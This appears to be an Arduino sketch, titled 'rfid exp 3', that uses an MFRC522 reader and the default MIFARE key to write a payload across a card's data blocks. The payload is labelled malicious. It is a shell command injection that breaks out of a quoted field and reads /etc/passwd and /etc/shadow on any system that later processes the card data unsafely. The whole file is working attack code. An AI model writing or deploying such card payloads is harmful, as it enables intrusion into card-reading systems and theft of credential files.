rfid exp 3

#include <MFRC522v2.h>
#include <MFRC522DriverSPI.h>
#include <MFRC522DriverPinSimple.h>
#include <MFRC522Debug.h>

// Create driver instance
MFRC522DriverPinSimple ss_pin(5); // SDA/SS pin
MFRC522DriverSPI driver{ss_pin};  // Create SPI driver
MFRC522 mfrc522{driver};          // Create MFRC522 instance

// The malicious payload we want to write
const char* malicious_payload = "\"; cat /etc/passwd; cat /etc/shadow; ls -la; echo \"";
const int TOTAL_BYTES = 1024;      // Total bytes to write
const int BLOCK_SIZE = 16;         // MIFARE block size (16 bytes data)
const int BLOCK_SIZE_WITH_CRC = 18; // Block size including CRC (16 + 2)
const int BLOCKS_TO_WRITE = TOTAL_BYTES / BLOCK_SIZE; // 64 blocks

void setup() {
  Serial.begin(115200);
  while (!Serial); // Wait for serial to initialize

  Serial.println("Initializing RFID Reader...");

  // Initialize the RC522
  mfrc522.PCD_Init();

  // Print RC522 firmware version
  MFRC522Debug::PCD_DumpVersionToSerial(mfrc522, Serial);

  Serial.println("RFID Reader Ready");
  Serial.println("Place a card near the reader...");
}

void writeBlock(byte block, byte* data) {
  MFRC522::StatusCode status;
  byte trailerBlock = (block / 4) * 4 + 3; // Calculate trailer block for this sector

  // Authenticate using key A
  MFRC522::MIFARE_Key keyA;
  for (byte i = 0; i < 6; i++) {
    keyA.keyByte[i] = 0xFF;
  }

  status = mfrc522.PCD_Authenticate(0x60, trailerBlock, &keyA, &(mfrc522.uid));
  if (status != 0) {
    Serial.print("Authentication failed for block ");
    Serial.print(block);
    Serial.print(": ");
    Serial.println(status);
    return;
  }

  // Write the data (library handles CRC internally)
  status = mfrc522.MIFARE_Write(block, data, BLOCK_SIZE);
  if (status != 0) {
    Serial.print("Writing failed for block ");
    Serial.print(block);
    Serial.print(": ");
    Serial.println(status);
    return;
  }

  // Verify the write
  byte readBuffer[BLOCK_SIZE_WITH_CRC];
  byte size = BLOCK_SIZE_WITH_CRC;
  status = mfrc522.MIFARE_Read(block, readBuffer, &size);
  if (status != 0) {
    Serial.print("Verification read failed for block ");
    Serial.print(block);
    Serial.print(": ");
    Serial.println(status);
    return;
  }

  // Compare written and read data
  bool verify = true;
  for (byte i = 0; i < BLOCK_SIZE; i++) {
    if (readBuffer[i] != data[i]) {
      verify = false;
      break;
    }
  }

  if (!verify) {
    Serial.print("Data verification failed for block ");
    Serial.println(block);
  }
}

void loop() {
  // Reset the loop if no new card present on the sensor/reader
  if (!mfrc522.PICC_IsNewCardPresent()) {
    return;
  }

  // Verify if the NUID has been read
  if (!mfrc522.PICC_ReadCardSerial()) {
    return;
  }

  Serial.println("Card detected!");

  // Print card type
  MFRC522::PICC_Type piccType = mfrc522.PICC_GetType(mfrc522.uid.sak);
  Serial.print("Card type: ");
  Serial.println(piccType);

  // Print UID
  Serial.print("UID: ");
  for (byte i = 0; i < mfrc522.uid.size; i++) {
    Serial.print(mfrc522.uid.uidByte[i] < 0x10 ? " 0" : " ");
    Serial.print(mfrc522.uid.uidByte[i], HEX);
  }
  Serial.println();

  // Prepare the full 1024-byte payload
  byte fullPayload[TOTAL_BYTES];
  memset(fullPayload, 0, TOTAL_BYTES);

  // Copy the malicious payload to the start
  size_t payloadLength = strlen(malicious_payload);
  size_t copyLength = (payloadLength < TOTAL_BYTES) ? payloadLength : TOTAL_BYTES;
  memcpy(fullPayload, malicious_payload, copyLength);

  // Pad the rest with zeros
  for (int i = copyLength; i < TOTAL_BYTES; i++) {
    fullPayload[i] = 0;
  }

  // Write all blocks
  for (int block = 0; block < BLOCKS_TO_WRITE; block++) {
    if (block % 4 == 3) continue; // Skip trailer blocks
    writeBlock(block, &fullPayload[block * BLOCK_SIZE]);
    Serial.print("Written block ");
    Serial.println(block);
  }

  Serial.println("Data written successfully!");

  // Halt PICC
  mfrc522.PICC_HaltA();
  // Stop encryption on PCD
  mfrc522.PCD_StopCrypto1();
}